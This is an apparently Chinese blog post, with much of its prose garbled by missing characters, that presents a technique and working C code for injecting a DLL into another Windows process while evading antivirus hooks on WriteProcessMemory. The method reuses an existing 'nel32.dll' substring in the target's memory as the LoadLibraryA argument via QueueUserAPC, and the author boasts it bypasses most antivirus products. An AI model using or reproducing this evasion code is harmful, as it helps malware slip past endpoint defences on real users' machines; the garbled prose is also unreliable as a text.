目
数
杀软都
hook NtWriteVirtualMemory
NtUserSetWindowsHookAW、NtUserSetWindowsHookE
防止代码注入。
关于代码注入Ring3层
主
有:
l 远程线程CreateRemoteThread
l 消息钩子SetWindowsHookEx
l Ring3 APC QueueUserApc
l 修改线程
文SetContextThread
其
第
种第三种需传入个param,但求这个param必须
目标进程
存空间,
些比较笨重,直接目标进程VirtualAllocEx存,然
希望参数容
入这个存,使
WriteProcessMemory函数,而这个函数被hook,所以杀软
以
容易拦截代码注入行
。
仔细想想,杀软这种防御失败!原因个param,攻击
完全没有必做这么动作去目标进程存空间申
存并存,
思考否以不WriteProcessMemory函数呢?反
目就得
个合理param,并且这个param目标进程存空间即!
思考,原切这么容易啊,哈哈!乐半天~~~
举个例子:假设这样注入:
QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param) ;
想让面param容个“xxx.dll”,就以,而且求这个param目标进程存空间
您想么?哈哈
答案:直接目标进程搜索个这样字符串“nel32.dll”就以啦!因“kernel32.dll” 这样字符串定存,那么“kernel32.dll” 不样,那就随便使“nel32.dll”,或“el32.dll”,都以啊!最往windows目录面撂进入个nel32.dll,这样注入部分杀软都不能拦截!哈哈!
段程序,做个试验,仅测试趋势,完美绕过!其实杀软稍测试。。。
DWORD EnumThreadandInjectDll(char *processName,HANDLE hProcess, DWORD dwProcessID,TIDLIST *pThreadIdList)
{
TIDLIST *pCurrentTid = pThreadIdList ;
const char szInjectModName[] = "nel32.dll";
DWORD dwLen = strlen(szInjectModName) ;
//////////////////////////////////////////////////////////////////////////
//不目标进程存
//直接目标进程搜索出 nel32.dll 这样字符串 并注入
//////////////////////////////////////////////////////////////////////////
int bufflen=30000;
char *buffer=(char *)malloc(sizeof(char)*bufflen);
DWORD dwNumberOfBytesRead;
DWORD defaultAddress;
//获得该进程基址
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID) ;
if(!hSnapshot)
{
printf("CreateToolhelp32Snapshot error!n");
return 0;
}
MODULEENTRY32 me = { sizeof(me) };
BOOL fOk =Module32First(hSnapshot,&me);
if(!fOk)
{
printf("Module32First error!n");
return 0;
}
for (; fOk; fOk = Module32Next(hSnapshot,&me))
{
printf("%s process module name = %sn",processName,me.szModule);
// 
得进程模块基址
if(stricmp(me.szModule,processName)==0)
{
defaultAddress=(DWORD)me.modBaseAddr;
printf("%s process module base = 0x%08Xn",processName,defaultAddress);
break;
}
}
//搜索
if(!ReadProcessMemory(hProcess,(LPCVOID)defaultAddress,buffer,bufflen,&dwNumberOfBytesRead))
{
printf("ReadProcessMemory error!n");
return 0;
}
for(int i=0;i<bufflen-dwLen;i++)
{
if(strnicmp(buffer+i,szInjectModName,dwLen)==0)
{
printf("found nel32.dll already!... %sn",buffer+i);
while (pCurrentTid)
{
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid) ;
if (hThread != NULL)
{
//
// 注入DLL指定进程
//
QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)(defaultAddress+i)) ;
}
printf("TID:%dn", pCurrentTid->dwTid) ;
pCurrentTid = pCurrentTid->pNext ;
}
break;
}
}
return 0 ;
}